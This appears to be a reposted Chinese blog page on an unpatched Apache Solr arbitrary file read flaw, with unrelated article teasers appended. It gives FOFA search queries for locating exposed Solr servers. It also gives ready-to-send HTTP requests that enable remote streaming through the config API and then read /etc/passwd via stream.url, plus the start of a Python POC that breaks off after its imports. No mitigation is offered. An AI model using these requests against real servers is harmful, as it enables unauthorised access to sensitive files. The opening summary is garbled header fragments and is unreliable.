Apache Solr 全版本任意读取文件漏洞

摘要:
indexInfo=假&rv:application/x-wwww-form-urlencodedContent-Length:param=ContentStreamsHTTP/1.1主机:rv:en-US;q=0.2接受编码:1内容类型:application/x-wwww-form-urlencoded内容长度:

一、漏洞背景

Apache Solr 全版本存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标系统的敏感文件,为什么说是全版本呢因为由于目前官方不予修复该漏洞,所以无安全版本。

二、网络空间搜索:

fofa语法如下

app="Apache-Solr"

app="Solr"

app="Solr" || app="Apache-Solr"

三、漏洞验证

URL1:http://ip:port/solr/admin/cores?indexInfo=false&wt=json

Apache Solr 全版本任意读取文件漏洞第1张

URL2:修改payload数据包

POST /solr/ik_core/config HTTP/1.1
Host: 116.62.xxx.xx:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 82

{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}

Apache Solr 全版本任意读取文件漏洞第2张

 看到标红的相应字符串,说明存在漏洞

URL3:继续修改数据包

POST /solr/ik_core/debug/dump?param=ContentStreams HTTP/1.1
Host: 116.62.00.00:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

stream.url=file:///etc/passwd

Apache Solr 全版本任意读取文件漏洞第3张

 POC

# coding:utf8
# Apache Solr 全版本通杀
# Fofa: app="Apache-Solr" || app="Solr"

import requests
import json
import  sys
import time

def title():
    print("

免责声明:内容来源于网络,仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇JAVA(JDK)内存溢出分析工具(VISUALVM)POJ 3320 Jessica‘s Reading Problem(哈希、尺取法)下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

MySQL三种备份

一)备份分类 1 2 3 4 5 6 7 8 9 10 11 12 冷备:cold backup数据必须下线后备份 温备:warm backup全局施加共享锁,只能读,不能写 热备:hot backup数据不离线,读写都能正常进行 备份的数据集 完全备份:full backup 部分备份:partial backup 备份时的接口(是直接备份数据文...

安卓智能聊天机器人开发(一)

这个聊天机器人有点像前段时间很火的一个安卓应用——小黄鸡 应用的实现其实很简单,网上有许多关于智能机器人聊天的接口,我们只需要去调用对应的接口,遵守它的API开发规范,就可以获取到我们想要的信息 这里我使用的接口是——图灵机器人(http://www.tuling123.com/openapi/) 这个接口给我们返回的是Json字符串,我们只需要对它进行...

oracle之字符集查看及其修改(转载)

当我们往表插入一些极限值的时候,比如一个title字段varchar(200) 标题的文字比如为101个字符的时候,就需要判断是否是16位的还是32位的了 一、什么是Oracle字符集        Oracle字符集是一个字节数据的解释的符号集合,有大小之分,有相互的包容关系。ORACLE 支持国家语言的体系结构允许你使用本地化语言来存储,处理,检索数据...

Clickhouse TTL的那些事

TTL简介 ClickHouse原生支持数据生命周期(TTL)管理的功能 TTL即Time To Live,表示数据的存活时间。在MergeTree中,可以为某个列字段或者整张表设置TTL。当时间达到时,若列字段级别的TTL则会删除这一列的数据;若表级别的TTL则会删除整张表的数据;若同时设置了列级别的和表级别的TTL则以先到期的为准。 无论列级别还是表级...

Sql日期时间格式转换;取年 月 日,函数:DateName()、DATEPART()

一、sql server2000中使用convert来取得datetime数据类型样式(全) 日期数据格式的处理,两个示例: CONVERT(varchar(16), 时间一, 20) 结果:2007-02-01 08:02/*时间一般为getdate()函数或数据表里的字段*/ CONVERT(varchar(10), 时间一, 23) 结果:2007-...

服务器系统及软件常见漏洞

最近由有一个什么事情,大家都懂。上头发了个加密传真,要求加强网络安全检查,于是乎所有服务器进行了大扫描,现整理一些常见漏洞... 漏洞名称 允许Traceroute探测 远端WWW服务支持TRACE请求 远端WWW服务提供了对WebDAV的支持 远端WEB服务器上存在/robots.txt文件 远端VNC服务正在运行 远端HTTP服务器类型和版本信...